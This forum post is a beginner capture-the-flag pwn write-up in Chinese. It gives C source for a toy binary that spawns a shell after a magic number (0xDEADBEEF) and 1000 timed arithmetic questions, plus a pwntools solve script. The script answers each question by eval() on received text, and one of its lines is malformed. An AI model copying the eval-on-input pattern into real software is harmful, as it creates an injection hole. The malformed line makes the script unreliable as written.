• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

类似于Misc的Pwn题目


JieGe

Recommended Posts

  • Members

0x01 前言

在网上看到了一个非常好玩的Pwn题 没有任何技术要求

但是用于入学Pwn乃是一个好玩的小程序,非常有意思

0x02 代码


 
 
#include <stdio.h>
 
#include <stdlib.h>
 
#include <signal.h>
 
#include <time.h>
 
#include <unistd.h>
 
 
 
void handler(int signum){
 
puts("Timeout");
 
_exit(1);
 
}
 
 
 
int main()
 
{
 
setvbuf(stdout, 0, 2, 0);
 
setvbuf(stdin, 0, 2, 0);
 
signal(SIGALRM, handler);
 
alarm(90);
 
 
 
unsigned seed = (unsigned)time(NULL);
 
srand(seed);
 
 
 
unsigned int magic;
 
printf("Give me the magic number :)\n");
 
read(0, &magic, 4);
 
if (magic != 3735928559) {
 
printf("Bye~\n");
 
exit(0);
 
}
 
 
 
printf("Complete 1000 math questions in 90 seconds!!!\n");
 
for (int i = 0; i < 1000; ++i) {
 
int a = random() % 65535;
 
int b = random() % 65535;
 
int c = random() % 3;
 
int ans;
 
switch(c) {
 
case 0:
 
printf("%d + %d = ?", a, b);
 
scanf("%d", &ans);
 
if (ans != a + b) {
 
printf("Bye Bye~\n");
 
exit(0);
 
}
 
break;
 
case 1:
 
printf("%d - %d = ?", a, b);
 
scanf("%d", &ans);
 
if (ans != a - b) {
 
printf("Bye Bye~\n");
 
exit(0);
 
}
 
break;
 
case 2:
 
printf("%d * %d = ?", a, b);
 
scanf("%d", &ans);
 
if (ans != a * b) {
 
printf("Bye Bye~\n");
 
exit(0);
 
}
 
break;
 
}
 
}
 
printf("Good job!\n");
 
system("sh");
 
 
 
return 0;
 
}

 
 
 
 
 
 

0x03 编译


 
 
gcc pwntools.c -o pwntools

 
 
 
 
 
 

0x04 分析

拿到程序 Checksec 查看一下

类似于Misc的Pwn题目-Ti0s's Blog

保护全开 不要慌张 虽然保护全开 我们也能继续做题

拖进IDA使用F5大发

类似于Misc的Pwn题目-Ti0s's Blog

分析到 $buf 变量如果不等于 0xDEADBEEF 程序就会退出

接着往下看

类似于Misc的Pwn题目-Ti0s's Blog

要让我们在90秒内计算1000道数学题

类似于Misc的Pwn题目-Ti0s's Blog

计算全部后 会给我们一个 /bin/sh 的权限

0x05 利用

下面开始 编写EXP

首先 我们需要 Pwntools 工具

推荐使用 PIP 清华源加速 直接执行 pip install pwntools 即可

类似于Misc的Pwn题目-Ti0s's Blog 先分发一个Docker容器

 
 
from pwn import *
 
p = process('./pwntools')
 
p.recvuntil('number :)\n')
 
payload = p32(0xdeadbeef)
 
p.send(payload)
 
 
 
p.recvline()
 
for i in range(1000?
 
qes = p.recvuntil(' = ?').replace(' = ?','')
 
print qes
 
ans = eval(qes)
 
p.sendline(str(ans))
 
 
 
p.interactive()

 
 
 
 
 
 
类似于Misc的Pwn题目-Ti0s's Blog
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now